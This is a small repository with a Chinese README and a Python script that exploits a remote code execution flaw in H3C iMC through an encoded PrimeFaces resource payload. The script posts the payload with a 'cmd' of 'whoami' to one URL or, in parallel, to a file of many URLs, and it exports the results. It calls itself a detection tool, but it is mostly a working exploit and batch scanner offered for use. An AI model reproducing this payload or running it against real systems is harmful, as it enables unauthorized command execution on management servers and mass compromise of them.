├── README.md
└── rce.py


/README.md:
--------------------------------------------------------------------------------
1 | # HCM-IMC-rce
2 | H3C iMC智能管理中心系统 远程代码执行漏洞
3 | ![image](https://github.com/user-attachments/assets/9d1cf401-0b92-4a15-bba4-0f53fe6c86e1)
4 | 
5 | -u 单个url的检测
6 | -f 批量检测
7 | -o 导出到文件
8 | 


--------------------------------------------------------------------------------
/rce.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import argparse
 3 | from concurrent.futures import ThreadPoolExecutor, as_completed
 4 | 
 5 | def banner():
 6 |     banner_text = """
 7 |      _   _  _____ _____     ________  ________ 
 8 | | | | ||____ /  __ \\   |_   _|  \\/  /  __ \\
 9 | | |_| |    / / /  \\/_____| | | .  . | /  \\/
10 | |  _  |    \\ \\ |  |______| | | |\\/| | |    
11 | | | | |.___/ / \\__/\\    _| |_| |  | | \\__/\\
12 | \\_| |_\\____/ \\____/    \\___/\\_|  |_|\\____/
13 |     """
14 |     print(banner_text)
15 |     print("Welcome to the H3C-IMC RCE vulnerability detection tool.  Author: Alex")
16 | 
17 | def check_rce(url):
18 |     headers = {
19 |         'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
20 |         'Accept-Encoding': 'gzip, deflate',
21 |         'Accept': '*/*',
22 |         'Connection': 'close'
23 |     }
24 | 
25 |     # RCE payload
26 |     payload = {
27 |         'pfdrt': 'sc',
28 |         'ln': 'primefaces',
29 |         'pfdrid': 'uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D',
30 |         'cmd': 'whoami'
31 |     }
32 | 
33 |     try:
34 |         response = requests.post(url, headers=headers, data=payload, timeout=10)
35 | 
36 |         # Check for RCE response
37 |         if response.status_code == 200 and "whoami" in response.text:
38 |             return f"[+] {url} has RCE vulnerability"
39 |         else:
40 |             return f"[-] No RCE vulnerability detected on {url}"
41 | 
42 |     except requests.exceptions.Timeout:
43 |         return f"[*] Timeout while connecting to {url}"
44 |     except requests.exceptions.RequestException as e:
45 |         return f"[*] Could not connect to {url}: {e}"
46 | 
47 | def check_urls(urls):
48 |     results = []
49 |     with ThreadPoolExecutor(max_workers=10) as executor:  # Adjust max_workers for your needs
50 |         future_to_url = {executor.submit(check_rce, url): url for url in urls}
51 |         for future in as_completed(future_to_url):
52 |             url = future_to_url[future]
53 |             try:
54 |                 result = future.result()
55 |                 results.append(result)
56 |             except Exception as e:
57 |                 results.append(f"[*] Error checking {url}: {e}")
58 |     return results
59 | 
60 | def main():
61 |     banner()
62 | 
63 |     parser = argparse.ArgumentParser(description="RCE Vulnerability Checker")
64 |     parser.add_argument('-u', '--url', type=str, help='Check a single URL')
65 |     parser.add_argument('-f', '--file', type=str, help='File containing list of URLs')
66 |     parser.add_argument('-o', '--output', type=str, help='Output file to save results')
67 | 
68 |     args = parser.parse_args()
69 | 
70 |     results = []
71 | 
72 |     if args.url:
73 |         results.append(check_rce(args.url))
74 |     elif args.file:
75 |         try:
76 |             with open(args.file, 'r') as file:
77 |                 urls = [line.strip() for line in file if line.strip()]
78 |             results.extend(check_urls(urls))
79 |         except FileNotFoundError:
80 |             print(f"[ERROR] File not found: {args.file}")
81 |             return
82 | 
83 |     if args.output:
84 |         with open(args.output, 'w') as output_file:
85 |             for result in results:
86 |                 output_file.write(result + '\n')
87 |                 print(result)  # Print to console as well
88 |         print(f"[INFO] Results saved to {args.output}")
89 |     else:
90 |         for result in results:
91 |             print(result)
92 | 
93 | if __name__ == "__main__":
94 |     main()
95 | 


--------------------------------------------------------------------------------